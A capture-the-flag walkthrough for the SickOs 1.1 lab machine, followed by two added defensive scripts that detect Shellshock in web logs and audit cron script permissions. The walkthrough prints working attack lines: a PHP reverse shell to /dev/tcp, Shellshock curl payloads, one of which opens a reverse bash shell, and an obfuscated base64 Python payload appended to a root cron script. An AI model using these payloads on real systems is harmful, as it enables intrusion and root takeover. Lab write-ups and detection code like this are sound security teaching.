Introduction
Series: SickOs (2 machines in this series)
Release date: December 11, 2015
Difficulty: Beginner to intermediate
Operating environment: VMware Workstation
Goal: Obtain root privileges and the flag
Learning points:
- Host discovery
- Port scanning and vulnerability scanning
- Scanning through a proxy
- Finding the website's admin backend
- Writing a shell from the admin backend
- Scheduled task (cron) privilege escalation
- Getting a shell via the Shellshock vulnerability
Target machine address: https://www.vulnhub.com/entry/sickos-11,132/
Information gathering
Host information detection
Netdiscover host discovery
sudo netdiscover -i eth0 -r 192.168.229.0/24
Port and service detection
Port 3128 turns out to be web related: it runs squid/3.1.19. A quick search shows that Squid is a proxy and web cache server, used mainly on Unix-like systems.
nmap -p- 192.168.229.135
nmap -p 22,3128,8080 -A 192.168.229.135
nmap -p 22,3128,8080 --script=vuln 192.168.229.135
Website detection
The web service exposes no valuable information, and directory brute-forcing straight against it turns up nothing either. A hyperlink on the page, when clicked, opens the computer's default email client. Since port 3128 runs a proxy service, try using it as a proxy and re-examine the website.
So start directory brute-forcing through the proxy:
dirsearch -u http://192.168.229.135 --full-url -R 2 -x 404 --exclude-sizes=0B --proxy=http://192.168.229.135:3128
With the proxy in place, nothing new was found on the homepage, but visiting the brute-forced "/robots.txt" revealed an interesting directory.
I brute-forced this subdirectory twice but found no meaningful directory. A Google search turned up the admin backend address:
In fact, if you pay attention to the structure of the web page, you can reach the admin backend directly by modifying the URL.
The weak password admin / admin logs in directly.
Getshell
MSF generates a PHP reverse shell payload, which I pasted into one of the pages, but after getting the shell the connection dropped; it seems a different reverse shell command is needed.
A Google search for "php reverse shell one liner" turns up plenty of simple and effective one-line web shells, such as:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.0.1/1234 0>&1'"); ?>
This time, even after the browser stops loading the page, my shell stays connected.
Sensitive Information Collection
A configuration file found directly in the current directory contained a database password. Given that passwords on this target tend to be reused, the same password should also allow SSH login to the target machine. Checking /home showed only one directory, sickos, so I logged in over SSH as that user.
SUDO privilege escalation
Second route to completing the box
Nikto site scan
Nikto scans the website and finds a suspected Shellshock vulnerability.
Verify the Shellshock vulnerability
On the previous target machine, both nmap and msf could be used to confirm a Shellshock vulnerability. Here I tried scanning through the proxy, but it failed, so I had to confirm the vulnerability by exploiting it directly.
Brute-forcing the /cgi-bin directory finds entries with a 200 response code; the following paths gave results:
- /cgi-bin/status
- /cgi-bin/status?full=true.sh
I did not test further directories; they should work too.
dirsearch -u http://192.168.229.135/cgi-bin/ --full-url -x 403 -f -e cgi,sh --proxy=http://192.168.229.135:3128
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://192.168.229.135/cgi-bin/status --proxy http://192.168.229.135:3128
Shellshock exploitation
# check whether nc is present
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'" http://192.168.229.135/cgi-bin/status?full=true.sh --proxy http://192.168.229.135:3128
# command execution, reverse bash shell
curl -H "user-agent: () { :; };/bin/bash -i >& /dev/tcp/192.168.229.128/4444 0>&1" http://192.168.229.135/cgi-bin/status?full=true.sh --proxy http://192.168.229.135:3128
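The two curl requests above leave a clear trace in the web server's access log: the Shellshock payload lives in the User-Agent header, and the request targets a bash-backed script under /cgi-bin/. The following added example (my own code, not from the original walkthrough) parses Apache combined-format log lines and flags Shellshock attempts in the User-Agent, Referer or request fields. The log lines, the hostnames and the function names are constructed for this example.

```python
import re

# Constructed sample lines in Apache "combined" log format; they are not
# taken from the original post. The first two mirror the requests made in
# the walkthrough above, the last two are ordinary traffic.
SAMPLE_LOG = """\
192.168.229.128 - - [11/Dec/2015:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 312 "-" "() { :; }; echo; echo; /bin/bash -c 'whoami'"
192.168.229.128 - - [11/Dec/2015:10:00:05 +0000] "GET /cgi-bin/status?full=true.sh HTTP/1.1" 200 312 "-" "() { :; };/bin/bash -i >& /dev/tcp/192.168.229.128/4444 0>&1"
192.168.229.50 - - [11/Dec/2015:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.229.50 - - [11/Dec/2015:10:01:07 +0000] "GET /robots.txt HTTP/1.1" 200 45 "-" "curl/7.68.0"
"""

# A Shellshock payload is an exported function definition followed by
# trailing commands: "() { ...; }; <command>". Whitespace varies in the wild,
# so the pattern is tolerant about spaces.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Combined log format: client ident user [time] "request" status bytes
# "referer" "user-agent". Escaped quotes inside fields are not handled here.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_in_header(value):
    """True if a single header value carries the Shellshock function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def is_shellshock(entry):
    # User-Agent is the header most often abused, but Referer and the request
    # line itself are also passed to CGI scripts as environment variables.
    return any(shellshock_in_header(entry[f]) for f in ("agent", "referer", "request"))


def targets_cgi(entry):
    """Requests under /cgi-bin/ are where a bash-based CGI would actually run the payload."""
    return "/cgi-bin/" in entry["request"]


def find_shellshock_attempts(log_text):
    """Scan a whole log and return one record per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_shellshock(entry):
            hits.append({
                "client": entry["client"],
                "time": entry["time"],
                "request": entry["request"],
                "cgi": targets_cgi(entry),
            })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        flag = "CGI" if hit["cgi"] else "non-CGI"
        print("%s %s [%s] %s" % (hit["time"], hit["client"], flag, hit["request"]))
```

To use it on a real server, replace SAMPLE_LOG with the contents of the access log. The `cgi` field is reported separately because a match against a static page is a probe, while a match against a bash CGI script is the case that actually yields command execution; patching bash and removing unneeded /cgi-bin/ scripts is the fix on the server side.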
A sensitive file was found, but nothing turned up in the scheduled tasks; maybe I was looking in the wrong way.
Scheduled task privilege escalation
- Checking the scheduled tasks reveals a Python script that looks usable for escalating privileges via cron
- Generate a Python reverse shell command and write it into the .py file
msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw
When writing the file, the contents became garbled and the file could not be edited normally. In theory, even with a problem in the code, the correct part should still execute, but no shell came back.
Fixing the garbled file contents and escalating privileges
I found a walkthrough online, and its author solved it like this: https://www.cnblogs.com/henry666/p/16954510.html
When running vim in a non-interactive shell, some operations behave oddly; for example, you cannot move the cursor up, down, left or right. First press o to enter insert mode (inserting a new line), then copy and paste, then press **ESC** in the upper right corner followed by **wq**, and finally press Enter.
But I had already messed up the contents, so there was no fixing it that way. Connecting with Ice Scorpion (Behinder) and repairing the file by hand is another option, but it is troublesome. Fortunately, this file is fairly simple:
- View the contents of the file and save the valuable information:
#!/usr/bin/python
- Edit the file:
vim connect.py
Once the file is open, hold down d on the keyboard so that connect.py is cleared, then save and exit
- Re-edit the file: first press o to enter insert mode (insert a new line), then paste #!/usr/bin/python, then press **ESC** in the upper right corner followed by **wq**, and finally press Enter.
- The next step is to add the payload; you can use the method from the previous step, or the following:
echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkFELgjAUhf+K7GmDmG1oKLEHCYOICtJ30bVQsk289v9rLIu9eR/udg/fPWesew5mnAIw8qGmwNYqCODVDKORCmBWjLt9amtba2ASiKWcsk1COU8p4wnyEGsroiiOPRWES6LuwN8p21eHc17+8p1aXHbHqiiveXYivguVRmslJ4ztS+Y1G0l80gC9vQaOgd67XmmDyQyvl4JsKch9cBD/b6Sy7nuMwqbTYVNDi8gb7kNeeg==')[0])))" >> connect.py
Checking shows the content is correct; after waiting a while the shell comes back, and privilege escalation succeeds.
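The escalation works because a root cron job executes a script that a low-privileged user can append to. The following added example (my own code, not part of the original walkthrough) is the check a defender would run: it parses /etc/crontab-style entries (minute hour dom month dow user command), finds the absolute file paths in each command, and reports any script that is world-writable, group-writable, or not owned by root although root runs it. The crontab text, the temporary files and the function names (parse_system_crontab, audit_crontab, demo) are constructed for this example.

```python
import os
import shlex
import stat
import tempfile


def parse_system_crontab(text):
    """Return (schedule, user, command) tuples from /etc/crontab-format text.
    Comments, blank lines and VAR=value environment lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                # environment assignment such as PATH=...
            continue
        if first.startswith("@"):       # @reboot / @daily style shortcuts
            fields = line.split(None, 2)
            if len(fields) == 3:
                entries.append((fields[0], fields[1], fields[2]))
        else:                           # five time fields, user, command
            fields = line.split(None, 6)
            if len(fields) == 7:
                entries.append((" ".join(fields[:5]), fields[5], fields[6]))
    return entries


def script_paths(command):
    """Absolute paths in a cron command that point at existing regular files."""
    try:
        tokens = shlex.split(command)
    except ValueError:                  # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [tok for tok in tokens if tok.startswith("/") and os.path.isfile(tok)]


def writable_by_non_root(path, cron_user):
    """Reasons why someone other than the cron user could change this file."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if cron_user == "root" and st.st_uid != 0:
        reasons.append("owned by uid %d, not root" % st.st_uid)
    return reasons


def audit_crontab(text):
    """One finding per (entry, path) pair where the script can be modified by others."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        for path in script_paths(command):
            reasons = writable_by_non_root(path, user)
            if reasons:
                findings.append({"schedule": schedule, "user": user,
                                 "path": path, "reasons": reasons})
    return findings


def demo():
    """Build a constructed crontab in a temp dir and audit it (sample data, not a real host)."""
    d = tempfile.mkdtemp()
    safe = os.path.join(d, "backup.py")
    weak = os.path.join(d, "connect.py")
    for p in (safe, weak):
        with open(p, "w") as f:
            f.write("#!/usr/bin/python\n")
    os.chmod(safe, 0o644)   # only the owner can write
    os.chmod(weak, 0o666)   # anyone can append a payload: the SickOs situation
    crontab = (
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "# constructed sample entries\n"
        "* * * * * root python %s\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        "@reboot root %s\n" % (weak, safe)
    )
    return audit_crontab(crontab)


if __name__ == "__main__":
    for finding in demo():
        print("%s %s %s: %s" % (finding["user"], finding["schedule"],
                                finding["path"], ", ".join(finding["reasons"])))
```

On a real host, feed audit_crontab the contents of /etc/crontab and the files under /etc/cron.d; per-user crontabs lack the user column and would need the user supplied separately. The fix for a flagged entry is to make the script root-owned and 0644 (or 0755) and to keep its parent directory non-writable, since a writable directory lets the file be replaced even when the file itself is locked down.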